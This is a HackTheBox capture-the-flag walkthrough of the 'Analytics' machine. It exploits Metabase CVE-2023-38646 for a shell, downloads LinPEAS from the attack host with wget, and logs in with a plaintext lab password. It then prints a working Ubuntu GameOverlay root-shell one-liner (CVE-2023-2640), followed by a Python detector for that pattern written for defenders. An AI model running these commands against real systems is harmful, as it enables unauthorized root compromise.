Analytics | HackTheBox Walkthrough
About Machine
Analytics is an easy Linux machine on HackTheBox, created by 7u9y and TheCyberGeek. During enumeration, a login page was discovered on port 80, hosted on a subdomain running Metabase, which was found to be vulnerable to CVE-2023-38646. The vulnerability was exploited with msfconsole to obtain a shell. During user enumeration with LinPEAS, an SSH username and password were obtained. For privilege escalation, enumeration showed that the machine was vulnerable to CVE-2023-2640, which led to root access.
Enumeration
nmap -sV -sC -p- 10.10.11.233
Port 22 (SSH) and port 80 (HTTP) were found to be open.
As port 80 was open, enumeration of it began and a website was discovered there. While viewing the page source, a subdomain, data.analytical.htb, was found, hosting a login page.
nano /etc/hosts
The subdomain was added to my attack machine’s /etc/hosts file.
While navigating to the subdomain, a webpage hosting a Metabase login form was encountered. I started the search for a Metabase vulnerability PoC.
The search showed that Metabase was vulnerable to CVE-2023-38646. After gaining an understanding of the vulnerability, an attempt was made to exploit it using msfconsole.
msfconsole
A payload for Metabase was searched for and used for the exploit.
The RPORT should be set to 80, and the RHOST should be set to data.analytical.htb. Additionally, the LHOST should be changed to your VPN IP address.
After running the payload, a shell on the Metabase host was successfully obtained. Further enumeration inside the machine was carried out with the linpeas script.
python3 -m http.server 80
wget http://<VPN IP>/linpeas.sh
The Python server was started on the attack machine in the directory where linpeas was located. Then, on the target, the home directory of the user “metabase” was accessed, and linpeas was downloaded from the attack machine.
bash linpeas.sh
After analyzing the results of linpeas, the username and password were discovered, and they were employed to log in via SSH.
ssh metalytics@<machine_IP>
Password: An4lytics_ds20223#
Using the above credentials, access to the user account was successfully gained.
The user flag was located in the home directory of the user.
Privilege Escalation
For the privilege escalation attempt, linpeas was downloaded onto the machine using a Python server, and the script was executed.
While reviewing the results of linpeas, it was discovered that the machine’s version was Ubuntu 22.04.3. The search for vulnerabilities pertaining to this version was initiated.
After extensive searching on Google, it was determined that the machine’s version was susceptible to CVE-2023-2640 and CVE-2023-32629.
unshare -rm sh -c "mkdir 1 u w m && cp /u*/b*/p*3 1/; setcap cap_setuid+eip 1/python3;mount -t overlay overlay -o rw,lowerdir=1,upperdir=u,workdir=w, m && touch m/*;" && u/python3 -c 'import pty; import os;os.setuid(0); pty.spawn("/bin/bash")'
In my case, CVE-2023-2640 was effective, and root access was obtained.
The root flag was found in the home directory of the root user.
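For defenders, the pattern in the one-liner above (a user namespace, a file capability grant and an overlay mount in a single command line) can be hunted for in process-execution telemetry. The following Python is an added example, not part of the original walkthrough; the function names and sample records are constructed for illustration, and Python 3.8+ is assumed.

```python
import os
import shlex
from contextlib import suppress
from itertools import groupby, takewhile

SHELLS = {"sh", "bash", "dash"}
OPERATORS = {"&&", "||", ";", "|", "&"}
REQUIRED = {"userns", "file_capability", "overlay_mount"}

def simple_commands(cmdline, depth=0):
    """Yield an argv list per simple command, unwrapping `sh -c '...'`."""
    tokens = cmdline.split()            # last resort if lexing keeps failing
    for closer in ("", '"', "'"):       # truncated record: retry with quote closed
        lexer = shlex.shlex(cmdline + closer, posix=True, punctuation_chars=True)
        lexer.whitespace_split, lexer.commenters = True, ""
        with suppress(ValueError):
            tokens = list(lexer)
            break
    groups = groupby(tokens, key=OPERATORS.__contains__)
    for argv in (list(g) for is_op, g in groups if not is_op):
        yield argv
        for i in range(1, len(argv) - 1):
            if argv[i] == "-c" and os.path.basename(argv[i - 1]) in SHELLS and depth < 3:
                yield from simple_commands(argv[i + 1], depth + 1)

def indicators(argv):
    """Return the indicator names matched by one simple command."""
    prog, args = os.path.basename(argv[0]), argv[1:]
    opts = list(takewhile(lambda a: a.startswith("-"), args))  # before payload
    if prog == "unshare" and any(a in ("--user", "--map-root-user") or
                                 (a[1:2] != "-" and set(a) & set("rU")) for a in opts):
        return {"userns"}
    if prog == "setcap" and any("cap_" in a.lower() for a in args):
        return {"file_capability"}
    if prog == "mount" and "-t overlay" in " ".join(args):
        return {"overlay_mount"}
    return set()

def flag_lines(cmdlines):
    """Return indexes of command lines that combine all three indicators."""
    return [i for i, line in enumerate(cmdlines)
            if REQUIRED <= set().union(*map(indicators, simple_commands(line)))]

# Constructed process-execution records (not captured from a real host).
SAMPLE = [
    'unshare -rm sh -c "mkdir 1 u w m && setcap cap_setuid+eip 1/python3;'
    'mount -t overlay overlay -o rw,lowerdir=1,upperdir=u,workdir=w m"',
    "setcap cap_net_bind_service+ep /usr/local/bin/webapp",
]
print(flag_lines(SAMPLE))  # [0]
```

Each indicator on its own is common in container and packaging tooling, so only command lines that combine all three are flagged.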